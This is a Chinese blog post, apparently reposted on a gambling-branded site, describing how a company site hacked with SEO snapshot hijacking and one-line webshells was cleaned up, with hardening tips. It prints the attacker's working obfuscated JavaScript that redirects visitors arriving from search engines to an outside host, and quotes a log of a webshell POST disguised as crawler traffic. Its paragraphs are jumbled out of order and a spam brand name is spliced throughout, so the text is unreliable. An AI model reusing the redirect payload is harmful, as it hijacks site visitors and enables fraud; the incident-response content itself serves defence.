找到最近修改的目录,对seo影响也算是非常的大

  • 栏目:软件 时间:2020-04-25 16:15
<返回列表

网站被黑是一件很烦恼的事情,尤其快照劫持和转跳。对seo影响也算是非常的大!

网站被挂马黑站是大站运营时候最不想遇到的!

近期发现公司网站首页文件经常被篡改为indax.php或indax.html,导致网站的功能无法正常使用,百度搜索关键词,在显示结果中点击公司网站,打开后跳转到别的网站上去了,尤其我们在百度做的推广,导致客户无法访问到我们公司网站上,给公司带来很大的影响,领导让尽快解决这个问题。这样的问题已经连续出现3次了找了建站公司也没有解决,反复篡改首页,比如今天我把文件删除替换掉后本地的备份文件,第二天立马又出现了,从网上查了些资料我才明白网站反复被篡改的原因。

百度中被劫持的快照:

首先如下案例是直接打开网站正常显示title,但是在百度查发现title和关键词已经变化成其他的了。

如何快速恢复网站被黑后的正常访问

韦德体育 1

首先被挂马和黑站是最近开始,我们打开满目录查看文件修改时间。找到最近修改的目录,如下helps目录。这个目录基本上是存放生成的静态文件的,下面突然多了个aspx,而且内容也很奇怪。

首先通过登录ftp,如果没有ftp信息的话可以向当初做网站的建设公司去索要,然后登录ftp后查看首页文件有无被增加一些加密的乱码如图:

我们先看下被劫持的HTML是如下:

韦德体育 2

韦德体育 3

韦德体育 4

我们再来看下程序:

index.aspx

已经被修改:

韦德体育 5

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p;}('3.4("<5 c=\"b\">");3.4("d 1=3.f");3.4("e(1.2(\"7\")>0 || 1.2(\"6\")>0 || 1.2(\"8\")>0 ||1.2(\"a\")>0 ||1.2(\"9\")>0 ||1.2(\"g\")>0 ||1.2(\"n\")>0 ||1.2(\"o\")>0 )");3.4("i.h=\"k://j.l.p:m\";");3.4("</5>");',26,26,'|s|indexOf|document|writeln|script|sogou|baidu|soso|uc|sm|Javascript|LANGUAGE|var|if|referrer|bing|href|location|www|https|28228|9999|yahoo|so|cc'.split('|'),0,{}))</script>

这分明就是一句话木马:

这些乱码通过 Unicode编码转换,然后这些乱码就会变成一些有害的信息如图:

日志分析工具:

我们直接下载最近20天日志进行分析,因为一句话木马需要post来操作进行修改:

韦德体育 6

然后分析到后台有个这样请求:

2018-05-21 08:45:30 bgw-016 112.125.178.92 POST /Manager/201805201611506528636.aspx - - 139.196.8.212 HTTP/1.1 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)+Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) http://www.weishengjiangeduan.com www.weishengjiangeduan.com 200 408 328

而且是模仿谷歌和百度的这样肯定就不正常了。!

我们只需要分析日志中所有异常请求,打开文件查看是否为正常系统文件!

打开这个文件/Manager/201805201611506528636.aspx,又是一句话木马:

韦德体育 7

当然这个小马不止一个了,需要打开网站所有目录进行检查。

韦德体育 8

然后我们清理掉那些小马基本上能解决被黑劫持问题,当然这个只是解决问题。。。但是没有解决根本!

我们需要分析这些小马是怎么来的,首先这些小马都是2018-4-20来创建的。首先查看4月20号做了什么事情。

然后加强目录的权限控制和各个密码的强度。使用密码生成器:

只有日常加强防护才能防止被黑!

文章由爱资料原创本文地址:

一句话木马是为后期上传和提权做准备,为了防止你删除首页title。我们需要删除这个源头。

韦德体育 9

韦德体育 10

这些乱码其中包含了跳转代码,通过百度搜索关键词进入的会直接被跳转到其他网站上,如果是直接输入网站域名的话是不会跳转,这是因为黑客对客户的访问来路进行了判断,导致的。如果有这些乱码的话,请立即清除,最简单的办法就是找到原先的index.php程序文件直接替换上去,然后把indax命名的文件全部删除掉,对比下文件的修改时间,看看还有哪些被篡改的,有的话一并删除掉,公司网站被黑有一段时间了,百度的快照也被篡改,网站快照被跳转劫持到其他网站上,导致网站的关键词排名都掉了,损失惨重。

韦德体育 11

导致是什么原因导致网站首页总是被修改呢

ok既然找到源头删掉即可!

因为网站的程序代码当初网站建设公司用的是开源的程序代码用的是dedecms程序开发的,而且建站公司根本就不管安全问题,只设计功能和外观,导致程序代码中有被黑客可以利用的网站漏洞进行了攻击并上传了木马后门对网站进行控制,这个木马后门的权限很大可以修改和上传网站的任意文件到目录,而且有的黑客为了达到永久存活木马的效果对网站管理后台的登录页面做了手脚,对登录的页面加了xss跨站脚本,导致每次登录后台都会被记录传输给xss跨站脚本攻击制造者,那么黑客就可以直接用cookies去登录后台进行操作,如果对程序代码不熟悉的话建议找专业的网站公司来对网站漏洞进行修复,国内做的比较好的如绿盟,Sine安全,启明星辰等都是比较厉害的安全公司,毕竟个人的技术有限不是专业的,只能清理一些恶意代码,但只能解决一时,使网站恢复正常访问,但没过多久就又被篡改跳转了。

为什么会突然出现这种一句话木马呢?首先需要了解自己空间的密码强度,设置好每个目录权限!其次重要的没有修改情况下不要开起FTP。还有网站不要交给不认识的人进行修改和升级,必须交给可靠人。

韦德体育 12

我们继续检查代码是否被修改过:

韦德体育 ,网站漏洞该如何修复的建议

韦德体育 13

1,针对网站程序源码进行升级,对网站的上传目录进行过滤限制。

这里引入了一个看似正常的style样式文件其实一点不正常,正常样式引入是<link>这样标签,但是这里却使用了引入模板方式那肯定不正常。

2,对网站的管理后台目录进行修改,不要用默认的admin,dede,houtai之类的名称进行登录。

样式里面内容:

3,管理员的账户和密码一定不要使用弱密码,一定要用字母加数字或符号组合的12到18位密码。

韦德体育 14

4,对网站上传功能进行限制,如果有必要的话直接删除掉这个上传功能代码文件。

这个时候如果还有那就要彻底的排查整个网站代码和样式文件了。

5,要经常对网站以及数据库进行全面的备份,防止数据被删除。

ok如上是解决网站被黑挂马方式,希望能帮到大家!

文章由爱资料原创本文地址:

上一篇:系统默认是忽略web.config中超时设置的,为我们提供了文件上传 下一篇:install 来进行安装,再来看看如何通过yum来安装

更多阅读

找到最近修改的目录,对seo影响也算是非

软件 2020-04-25
网站被黑是一件很烦恼的事情,尤其快照劫持和转跳。对seo影响也算是非常的大! 网站被挂马黑...
查看全文

系统默认是忽略web.config中超时设置的,为

软件 2020-04-25
我们在配置好了php.ini后超时和上传大小都设置了,但是使用浏览器上传大一点文件还是不能成...
查看全文

管理员可能会禁止自动启动,IIS 搜索引擎

软件 2020-04-25
使用 iisweb.vbs start 启动网站的方法,iisweb.vbsstart 应用到: Windows Server 2003, Windows Server 2003 R2, W...
查看全文

友情链接: 网站地图

Copyright © 2015-2019 http://www.koi-bumi.com. 韦德体育有限公司 版权所有